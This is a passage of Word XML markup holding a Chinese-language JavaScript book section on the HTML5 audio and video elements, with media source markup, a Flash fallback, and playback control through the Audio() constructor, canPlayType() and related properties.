        <w:t>＞元素来为指定不同格式的媒体源：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio id="music"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>source src="music.mp3"type="audio/mpeg"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>source src="music.ogg"type='audio/ogg;cod</w:t>
      </w:r>
      <w:r>
        <w:t>ec="vorbis"'</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意的是，＜</w:t>
      </w:r>
      <w:r>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素没有任何内容：没有闭合的＜</w:t>
      </w:r>
      <w:r>
        <w:t>/source</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签，也不需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>“/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>来结束它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>支持＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的浏览器不会渲染这些元素的内容。而不支持它们的浏览器则会将它们的内容都渲染出来，因此，可以在这些元素中放置后备内容（比如，一个用于调用</w:t>
      </w:r>
      <w:r>
        <w:t>Flash</w:t>
      </w:r>
      <w:r>
        <w:t>插件的＜</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>video id="news"width=640 height=480 controls preload</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>支持的</w:t>
      </w:r>
      <w:r>
        <w:t>WebM</w:t>
      </w:r>
      <w:r>
        <w:t>格式</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>source src="news.webm"type='video/webm;codecs="vp8,vorbis"'</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--IE</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>支持的</w:t>
      </w:r>
      <w:r>
        <w:t>H.264</w:t>
      </w:r>
      <w:r>
        <w:t>格式</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>source src="news.mp4"type='video/mp4;codecs="avc1.42E01E,mp4a.40.2"'</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--Flash</w:t>
      </w:r>
      <w:r>
        <w:t>插件作为后备方案</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>object width=640 height=480 type="applicati</w:t>
      </w:r>
      <w:r>
        <w:t>on/x-shockwave-flash"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data="flash_movie_player.swf"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>这里的参数元素用于配置</w:t>
      </w:r>
      <w:r>
        <w:t>Flash</w:t>
      </w:r>
      <w:r>
        <w:t>视频播放器</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>文本是最终的后备内容</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>video element not supported and Flash plugin not installed.</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/object</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/video</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素支持一个</w:t>
      </w:r>
      <w:r>
        <w:t>controls</w:t>
      </w:r>
      <w:r>
        <w:t>属性。如果设置了该属性（或者对应的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>），它们将会显示一系列播放控件，包括播放、暂停按钮、音量控制等。除此之外，＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素还提供了</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>能让脚本控制媒体，使用该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>可以实现在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用中添加简单的声音效果或者创建自定义音频和视频控制面板。尽管，音频和视频控制面板在外观上有很大差别，但是两个元素基本共享相同的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>（唯一不同的是，＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素还有</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性），本节后面要介绍的很多内容对两个元素几乎都有效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>Audio()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在不设置</w:t>
      </w:r>
      <w:r>
        <w:t>controls</w:t>
      </w:r>
      <w:r>
        <w:t>属性的情况下，＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素没有任何视觉外观。正如可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Image()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数来创建一张屏幕外图片那样，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>中的媒体</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>同样也允许使用</w:t>
      </w:r>
      <w:r>
        <w:t>Audio()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，并将媒体源</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>作为参数，来创建一个屏幕外音频元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Audio("chime.wav").play();//</w:t>
      </w:r>
      <w:r>
        <w:t>载入并播放声音效果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Audio()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的返回值和通过从文档中查询＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素或者使用</w:t>
      </w:r>
      <w:r>
        <w:t>document.createElement("audio")</w:t>
      </w:r>
      <w:r>
        <w:t>来创建一个新的元素获得的都是同一类对象</w:t>
      </w:r>
      <w:r>
        <w:t>。这里要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>Audio()</w:t>
      </w:r>
      <w:r>
        <w:t>是音频元素特有的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，换句话说，视频元素是没有类似</w:t>
      </w:r>
      <w:r>
        <w:t>Video()</w:t>
      </w:r>
      <w:r>
        <w:t>这样的构造函数的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管对于多种不同格式的文件要分别定义媒体比较繁琐，但是，能够不借助插件在浏览器中原生播放音频和视频是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>中非常强大的新特性。要注意的是，对于媒体编解码器的问题以及浏览器对其兼容性的问题并不在本书讨论的范畴。接下来会集中讨论如何利用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript API</w:t>
      </w:r>
      <w:r>
        <w:t>来操控音频和视频流。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="525" w:name="21_2_1_Lei_Xing_Xuan_Ze_He_Jia_Zai_"/>
      <w:r>
        <w:t>21.2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　类型选择和加载</w:t>
      </w:r>
      <w:bookmarkEnd w:id="525"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>想要测试一个媒体元素能否播放指定类型的媒体文件，可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>canPlayType</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>方法并将媒体的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型（有时需要包含</w:t>
      </w:r>
      <w:r>
        <w:t>codec</w:t>
      </w:r>
      <w:r>
        <w:t>参数）传递进去。如果它不能播放该类型的媒体文件，该方法会返回一个空的字符串（一个假值）；反之，它会返回一个字符串：</w:t>
      </w:r>
      <w:r>
        <w:t>"maybe"</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>"probably"</w:t>
      </w:r>
      <w:r>
        <w:t>。之所以返回</w:t>
      </w:r>
      <w:r>
        <w:t>"probably"</w:t>
      </w:r>
      <w:r>
        <w:t>这样不确定的结果，是因为音频和视频编解码器本身就非常复杂，在没有真正下载并尝</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>试播放指定类型的媒体前很难确定是否真的可以支持播放此类型文件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=new Audio();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a.canPlayType("audio/wav")){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.src="soundeff</w:t>
      </w:r>
      <w:r>
        <w:t>ect.wav";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.play();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当设置媒体元素的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性的时候，加载媒体的过程就开始了（除非将</w:t>
      </w:r>
      <w:r>
        <w:t>preload</w:t>
      </w:r>
      <w:r>
        <w:t>设置成</w:t>
      </w:r>
      <w:r>
        <w:t>"auto"</w:t>
      </w:r>
      <w:r>
        <w:t>，否则，只会加载少量内容，因此该过程不会持续很长时间）。当设置</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性的时候，如果有其他的媒体文件正在加载或者播放，则会中止它们的加载或者播放过程。如果通过在媒体元素中添加＜</w:t>
      </w:r>
      <w:r>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素而不是设置</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性的方式指定媒体源，媒体元素无法知道是否已经将一系列＜</w:t>
      </w:r>
      <w:r>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素都添加完毕了，因此它也不会开始选择并加载＜</w:t>
      </w:r>
      <w:r>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素指定的媒体源文件，除非显式地调用</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="526" w:name="21_2_2_Kong_Zhi_Mei_Ti_Bo_Fang_"/>
      <w:r>
        <w:t>21.2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　控制媒</w:t>
      </w:r>
      <w:r>
        <w:t>体播放</w:t>
      </w:r>
      <w:bookmarkEnd w:id="526"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素最重要的方法是</w:t>
      </w:r>
      <w:r>
        <w:t>play()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>pause()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它们用来控制媒体开始和暂停媒体的播放：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>文档载入完成后，开始播放背景音乐</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.addEventListener("load",function(){document.getElementById("music").play();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了开始和暂停播放音频和视频，还可以通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>currentTime</w:t>
      </w:r>
      <w:r>
        <w:t>属性来进行定点播放。该属性指定了播放器应该跳过播放的时间（单位为秒），可以在媒体播放或者</w:t>
      </w:r>
      <w:r>
        <w:t>暂停的时候设置该属性。（</w:t>
      </w:r>
      <w:r>
        <w:t>initialTime</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:t>属性确定了</w:t>
      </w:r>
      <w:r>
        <w:t>currentTime</w:t>
      </w:r>
      <w:r>
        <w:t>的有效取值范围；后面会对这些属性做详细介绍。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>volume</w:t>
      </w:r>
      <w:r>
        <w:t>属性表示播放音量，介于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（静音）～</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>（最大音量）之间。将</w:t>
      </w:r>
      <w:r>
        <w:t>muted</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>则会进入静音模式，设置为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>则会恢复之前指定的音量继续播放。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>playbackRate</w:t>
      </w:r>
      <w:r>
        <w:t>属性用于指定媒体播放的速度。该属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>表示正常速度，大于</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>则表示</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>快进</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>之间的值则表示</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>慢放</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。负值则表示回放，但是直到撰写本书时，浏览器还未支持该特性。＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素还有一个</w:t>
      </w:r>
      <w:r>
        <w:t>defaultPlaybackRate</w:t>
      </w:r>
      <w:r>
        <w:t>属性。不管是否调用</w:t>
      </w:r>
      <w:r>
        <w:t>play()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来播放媒体，</w:t>
      </w:r>
      <w:r>
        <w:t>playbackRate</w:t>
      </w:r>
      <w:r>
        <w:t>属性默认值都会被设置成</w:t>
      </w:r>
      <w:r>
        <w:t>defaultPlaybackRate</w:t>
      </w:r>
      <w:r>
        <w:t>的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>currentTime</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>volume</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>muted</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>playbackRate</w:t>
      </w:r>
      <w:r>
        <w:t>属性并不只是用于控制媒体播放。如果一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞或者＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＞元素有</w:t>
      </w:r>
      <w:r>
        <w:t>controls</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它就会在播放器上显示控件，让用户控制媒体的播放。不仅如此，脚本也可以通过查询诸如</w:t>
      </w:r>
      <w:r>
        <w:t>muted</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>currentTime</w:t>
      </w:r>
      <w:r>
        <w:t>这样的</w:t>
      </w:r>
      <w:r>
        <w:t>属性来得知当前媒体的播放情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>controls</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>loop</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>preload</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>autoplay</w:t>
      </w:r>
      <w:r>
        <w:t>这样的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性不仅影响音频和视频的播放，而且还可以作为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性来设置和查询。</w:t>
      </w:r>
      <w:r>
        <w:t>controls</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定是否在浏览器中显示播放控件。设置该属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
